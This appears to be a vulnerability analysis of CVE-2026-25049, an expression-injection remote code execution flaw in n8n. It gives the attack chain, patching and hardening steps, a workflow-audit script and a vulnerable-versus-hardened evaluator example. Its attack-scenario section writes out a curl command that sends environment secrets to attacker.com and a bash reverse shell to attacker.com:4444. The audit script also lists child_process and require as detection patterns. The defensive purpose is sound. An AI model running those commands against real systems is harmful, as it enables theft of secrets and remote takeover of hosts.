CVE-2026-25049
Weakness (CWE)
CVSS Vector (v4.0)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
- Attack Vector: Network
- Attack Complexity: Low
- Attack Requirements: None
- Privileges Required: Low
- User Interaction: None
- Confidentiality (Vulnerable System): High
- Integrity (Vulnerable System): High
- Availability (Vulnerable System): High
- Confidentiality (Subsequent System): High
- Integrity (Subsequent System): High
- Availability (Subsequent System): High
Description
n8n is an open source workflow automation platform. Prior to versions 1.123.17 and 2.5.2, an authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n. This issue has been patched in versions 1.123.17 and 2.5.2.
CVE-2026-25049: Professional Cybersecurity Analysis
Executive Summary
CVE-2026-25049 represents a critical remote code execution (RCE) vulnerability in the n8n workflow automation platform with a CVSS score of 9.9. The vulnerability allows authenticated users with workflow creation or modification privileges to execute arbitrary system commands through crafted expressions, posing severe risk to organizational infrastructure.
1. Vulnerability Assessment and Severity Evaluation
Severity Classification
- CVSS Score: 9.9 (Critical)
- Attack Complexity: Low
- Privileges Required: Low (authenticated user)
- User Interaction: None
- Scope: Changed (likely affects resources beyond the vulnerable component)
Technical Assessment
This vulnerability represents an expression injection leading to command injection, a class of vulnerabilities that bypasses input validation mechanisms. The critical severity is justified by:
- Direct system command execution on the host infrastructure
- Authenticated but low-privilege exploitation (any user with workflow permissions)
- Potential for lateral movement within the network
- Data exfiltration capabilities
- Complete system compromise potential
The 9.9 score suggests impacts across confidentiality, integrity, and availability with scope change, indicating the vulnerability can affect resources beyond the application itself.
2. Attack Vectors and Exploitation Methods
Primary Attack Vector
Authenticated Expression Injection → Command Execution
Exploitation Methodology
Attack Chain:
1. Attacker authenticates with valid credentials
2. Creates or modifies workflow with malicious expressions
3. Crafted expressions bypass sanitization
4. Expression evaluation triggers system command execution
5. Commands execute with n8n process privileges
Likely Exploitation Techniques
Expression Injection Patterns:
- Template injection in workflow parameters
- Code evaluation through expression parsers (e.g., JavaScript eval, template engines)
- Abuse of built-in functions that interact with the operating system
- Prototype pollution leading to command execution
Example Attack Scenarios:
// Hypothetical malicious workflow expression
{{ system.exec('curl attacker.com/exfil?data=' + env.secrets) }}
// Or through Node.js child_process
{{ require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1') }}
Attack Prerequisites
- Valid user credentials with workflow creation/modification permissions
- Network access to n8n instance
- Knowledge of n8n's expression syntax
Post-Exploitation Capabilities
- Reverse shell establishment
- Credential harvesting (database credentials, API keys, environment variables)
- Lateral movement to connected systems
- Data exfiltration from workflows and databases
- Persistence mechanisms through workflow modifications
- Supply chain attacks via compromised automation workflows
3. Affected Systems and Software Versions
Vulnerable Versions
- n8n versions < 1.123.17 (Version 1.x branch)
- n8n versions < 2.5.2 (Version 2.x branch)
Affected Deployment Scenarios
- Self-hosted installations (Docker, Kubernetes, bare metal)
- Cloud deployments (AWS, Azure, GCP)
- Enterprise on-premises installations
- Development and staging environments
Platform Considerations
- Operating Systems: Linux, Windows, macOS (all platforms running n8n)
- Container environments: Docker containers with host access
- Orchestration platforms: Kubernetes clusters
Dependency Chain Risks
n8n's architecture typically includes:
- Node.js runtime (potential privilege escalation)
- Database systems (PostgreSQL, MySQL, SQLite)
- Connected third-party services via integrations
- Message queues and caching systems
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
1. Emergency Patching
# For version 1.x users (global npm install)
npm install -g n8n@1.123.17
# For version 2.x users
npm install -g n8n@2.5.2
# Docker users: pull the patched tag, then recreate the container from it
docker pull n8nio/n8n:1.123.17
# or
docker pull n8nio/n8n:2.5.2
2. Access Control Audit
- Review all users with workflow creation/modification permissions
- Implement principle of least privilege
- Revoke unnecessary workflow permissions
- Enable multi-factor authentication (MFA) for all accounts
3. Incident Response Activities
- Review workflow modification logs for suspicious activity
- Audit existing workflows for malicious expressions
- Check system logs for unexpected command executions
- Monitor outbound network connections for data exfiltration
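The workflow audit step above can be automated. This is an added example, not code from the advisory or the n8n project; it assumes n8n's exported workflow JSON, where expression parameters carry a leading "=" and embed code in {{ }}, and the token list is a heuristic for expressions that reach outside the item data context.

```javascript
// Heuristic signatures for expressions that step outside normal item data.
const SUSPICIOUS = [
  /\brequire\s*\(/,               // module loading from inside an expression
  /\bchild_process\b/,            // process-spawning module by name
  /\bprocess\s*[.\[]/,            // access to the Node.js process object
  /\bconstructor\b/,              // common route from any value back to Function
  /\b__proto__\b|\bprototype\b/,  // prototype manipulation
  /\bglobal(This)?\b/,            // global object access
];

// Walk parameter values (strings, arrays, nested objects) and yield
// [path, value] pairs for every value that is an n8n expression.
function* expressionValues(value, path = []) {
  if (typeof value === 'string') {
    if (value.startsWith('=')) yield [path.join('.'), value];
  } else if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) yield* expressionValues(value[i], [...path, i]);
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) yield* expressionValues(v, [...path, k]);
  }
}

// One finding per suspicious expression: node name, parameter path and the
// signature that matched. A clean workflow yields an empty array.
function auditWorkflow(workflow) {
  const findings = [];
  for (const node of workflow.nodes || []) {
    for (const [param, expr] of expressionValues(node.parameters || {})) {
      const hit = SUSPICIOUS.find((re) => re.test(expr));
      if (hit) findings.push({ node: node.name, param, pattern: hit.source });
    }
  }
  return findings;
}

// Constructed sample workflow: one benign expression, one that loads a module.
const sampleWorkflow = {
  nodes: [
    { name: 'Set', type: 'n8n-nodes-base.set',
      parameters: { values: { string: [{ name: 'greeting', value: '={{ "Hi " + $json.name }}' }] } } },
    { name: 'HTTP Request', type: 'n8n-nodes-base.httpRequest',
      parameters: { url: '={{ require("child_process") && $json.url }}' } },
  ],
  connections: {},
};

console.log(JSON.stringify(auditWorkflow(sampleWorkflow), null, 2));
```

Run it over every workflow exported from the instance and review each finding by hand; a match is a lead, not proof of compromise.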
Short-term Mitigations (Priority 2)
1. Network Segmentation
Implement network controls:
- Isolate n8n instances in dedicated VLANs
- Restrict outbound connections to required services only
- Deploy Web Application Firewall (WAF) rules
- Enable egress filtering
2. Enhanced Monitoring
Deploy detection mechanisms:
- SIEM rules for unusual process spawning
- File integrity monitoring on n8n directories
- Network traffic analysis for C2 patterns
- Workflow change alerting
3. Runtime Protection
- Deploy application security monitoring (RASP/IAST)
- Implement container security policies (AppArmor, SELinux)
- Use seccomp profiles to restrict system calls
- Enable read-only file systems where possible
Long-term Security Enhancements (Priority 3)
1. Architecture Hardening
- Run n8n with minimal privileges (non-root user)
- Implement sandboxing for workflow execution
- Deploy in isolated container environments
- Use security contexts in Kubernetes
2. Security Operations
- Establish regular vulnerability scanning schedules
- Implement automated patch management
- Conduct periodic security assessments
- Develop workflow security review processes
3. Governance and Compliance
- Create workflow approval workflows for production
- Implement code review for complex workflows
- Establish security baselines and hardening guides
- Document incident response procedures
Compensating Controls (If Patching Delayed)
Temporary Mitigations:
1. Disable workflow creation for non-essential users
2. Implement strict egress firewall rules
3. Deploy runtime application self-protection (RASP)
4. Enable comprehensive audit logging
5. Implement workflow approval processes
6. Restrict n8n to internal networks only
5. Impact on Cybersecurity Landscape
Industry-Wide Implications
1. Workflow Automation Security Concerns
- Highlights risks in low-code/no-code platforms
- Demonstrates expression language security challenges
- Raises awareness of automation platform attack surfaces
2. Supply Chain Risks
- Compromised workflows can affect downstream systems
- Automated processes become attack vectors
- Trust boundaries in integration platforms
3. Insider Threat Considerations
- Low privilege requirements increase insider threat risks
- Legitimate functionality abused for malicious purposes
- Challenges in distinguishing malicious from legitimate workflows
Broader Security Trends
1. Expression Language Vulnerabilities
Similar vulnerabilities have affected:
- Template engines (Jinja2, Handlebars, Velocity)
- Workflow platforms (Apache Airflow, Zapier alternatives)
- Configuration management tools
2. Authentication ≠ Authorization
Reinforces the principle that authenticated access doesn't guarantee safe operations without proper input validation and sandboxing.
3. Open Source Security
- Demonstrates importance of security audits in OSS projects
- Highlights responsible disclosure effectiveness
- Shows value of active security maintenance
Threat Actor Interest
High-value targets for:
- APT groups: For persistence and lateral movement
- Ransomware operators: For credential harvesting and deployment
- Insider threats: Low technical barrier to exploitation
- Supply chain attackers: Compromise automation workflows affecting multiple organizations
6. Technical Details for Security Professionals
Vulnerability Mechanics
Root Cause Analysis: The vulnerability likely stems from insufficient sanitization of user-supplied expressions before evaluation in a context that allows system command execution.
Common Implementation Flaws:
// VULNERABLE PATTERN (hypothetical)
function evaluateExpression(expression, context) {
  // Direct evaluation without sanitization: the expression text runs with the
  // full privileges of the n8n process, and `context` is never enforced
  return eval(expression); // or vm.runIn
}
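The vulnerable pattern next to a hardened alternative, as an added example that is not n8n's code: both render {{ }} placeholders in a workflow parameter against a per-item data context, but the hardened version never evaluates code, it only resolves a dotted field path. The template syntax, function names and sample data are assumptions made for this illustration.

```javascript
const PLACEHOLDER = /\{\{\s*([^}]*?)\s*\}\}/g;

// VULNERABLE: hands the expression text to eval. It runs with the evaluator's
// own privileges, so it can reach process, require and everything else in scope.
function renderUnsafe(template, context) {
  return template.replace(PLACEHOLDER, (_, expr) => {
    const $json = context;      // what the author meant to expose
    return String(eval(expr));  // everything else is exposed too
  });
}

// HARDENED: no code evaluation. An expression may only be a dotted property
// path rooted at $json, and the lookup walks a plain data object using own
// properties only, so prototype, constructor and globals are unreachable.
const PATH = /^\$json(?:\.[A-Za-z_][A-Za-z0-9_]*)+$/;
const DENY = new Set(['__proto__', 'constructor', 'prototype']);

function resolvePath(expr, context) {
  if (!PATH.test(expr)) throw new Error(`rejected expression: ${expr}`);
  let cur = context;
  for (const key of expr.split('.').slice(1)) {
    if (DENY.has(key) || cur === null || typeof cur !== 'object' ||
        !Object.prototype.hasOwnProperty.call(cur, key)) {
      throw new Error(`unknown field: ${key}`);
    }
    cur = cur[key];
  }
  return cur;
}

function renderSafe(template, context) {
  return template.replace(PLACEHOLDER, (_, expr) => String(resolvePath(expr, context)));
}

// Constructed sample item: a normal lookup, then an expression that leaves the
// data context. The unsafe renderer reaches the Node.js process object; the
// safe one refuses anything that is not a field lookup.
const item = { name: 'alice', address: { city: 'Oslo' } };
console.log(renderSafe('Hello {{ $json.name }} from {{ $json.address.city }}', item));
console.log(renderUnsafe('{{ typeof process }}', item)); // "object": host access leaked
try { renderSafe('{{ typeof process }}', item); } catch (e) { console.log(e.message); }
```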